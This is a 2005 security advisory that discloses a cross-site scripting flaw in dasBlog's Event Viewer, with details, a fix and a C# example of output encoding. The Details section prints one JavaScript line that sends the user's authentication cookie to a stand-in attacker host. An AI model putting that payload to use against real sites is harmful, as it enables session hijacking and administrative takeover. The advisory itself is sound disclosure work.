Security Advisory : New XSS Vulnerability in dasBlog Community Edition
Cross-Site Scripting Vulnerability in Newtelligence DasBlog Community Edition
Author: Dominick Baier <dbaier@ernw.de>
1. Summary: An XSS (Cross-Site Scripting) vulnerability in DasBlog's Event Viewer allows an attacker to inject script code that is executed on the client's machine. This allows the attacker to transfer the ASP.NET authentication cookie to a server of his choice. The attacker can use this cookie to log on to DasBlog and modify blog entries and configuration settings.
2. Severity: Critical
3. Systems affected
DasBlog Versions: All
Browsers: Tested with IE 6 and Firefox 1.0
4. Patch Availability
5. Details
The Event Viewer shows details about failed requests that were made to the blog site. As extra information, the request details, e.g. the ViewState, are shown. It is possible to specially malform parts of the request to inject script code. This code gets embedded in the HTML pages and is executed on the client. With specially crafted JavaScript code an attacker can transfer the ASP.NET Forms Authentication cookie to a server of his choice. By injecting this cookie into an HTTP request to DasBlog he can authenticate without having to know the username or the password and enter the administrative area.
Examples of script injections
Embed script code in the ViewState and send it to dasBlog
Example of transferring a cookie using JavaScript
<script>document.location='http://www.evil-site.com/cookieEater.aspx?cookie='+document.cookie</script>
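As an added illustration (not code from this advisory or from DasBlog itself), the following C# shows the class of defect described above beside its fix: a hypothetical event-viewer renderer that writes request details such as the ViewState into HTML unencoded, and the same renderer with HttpUtility.HtmlEncode applied to every request-derived value. The class name, method names and the ViewState sample are constructed for the example.

```csharp
using System;
using System.Text;
using System.Web;   // HttpUtility lives in System.Web.dll (.NET Framework)

// Hypothetical renderer for one failed-request entry in an event viewer page.
public static class EventViewerRenderer
{
    // Vulnerable form: request details (URL, ViewState) are written into the
    // page as-is, so any markup they carry is interpreted by the browser.
    public static string RenderUnsafe(string requestUrl, string viewState)
    {
        StringBuilder html = new StringBuilder();
        html.Append("<tr><td>").Append(requestUrl).Append("</td>");
        html.Append("<td>").Append(viewState).Append("</td></tr>");
        return html.ToString();
    }

    // Hardened form: every request-derived value is HTML-encoded on output.
    // '<' becomes '&lt;', so an injected <script> tag is displayed as text.
    public static string RenderSafe(string requestUrl, string viewState)
    {
        StringBuilder html = new StringBuilder();
        html.Append("<tr><td>").Append(HttpUtility.HtmlEncode(requestUrl)).Append("</td>");
        html.Append("<td>").Append(HttpUtility.HtmlEncode(viewState)).Append("</td></tr>");
        return html.ToString();
    }

    // Output check: does the rendered fragment still contain a raw script tag?
    public static bool ContainsRawScriptTag(string html)
    {
        return html.IndexOf("<script", StringComparison.OrdinalIgnoreCase) >= 0;
    }

    public static void Main()
    {
        // Constructed sample: a malformed ViewState value carrying a script tag,
        // as it would be recorded after a failed request.
        string url = "/default.aspx";
        string badViewState = "dDwtMTIzNDU2Nzg5O<script>alert('xss')</script>";

        string unsafeHtml = RenderUnsafe(url, badViewState);
        string safeHtml = RenderSafe(url, badViewState);

        Console.WriteLine("unsafe contains raw script tag: " + ContainsRawScriptTag(unsafeHtml));
        Console.WriteLine("safe contains raw script tag:   " + ContainsRawScriptTag(safeHtml));
        Console.WriteLine(safeHtml);
    }
}
```

Output encoding is the root-cause fix for this defect class; applying the vendor update named in the Solution section remains the required remediation for affected installations.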
6. Solution: Install the latest version (which at the time of writing is 1.7.5016.2).
7. Disclaimer: The information in this advisory is provided "AS IS" without warranty of any kind. In no event shall the authors be liable for any damages whatsoever, including direct, indirect, incidental, consequential, loss of business profits or special damages, due to the misuse of any information provided in this advisory.
Sunday, March 06, 2005 8:27:19 AM UTC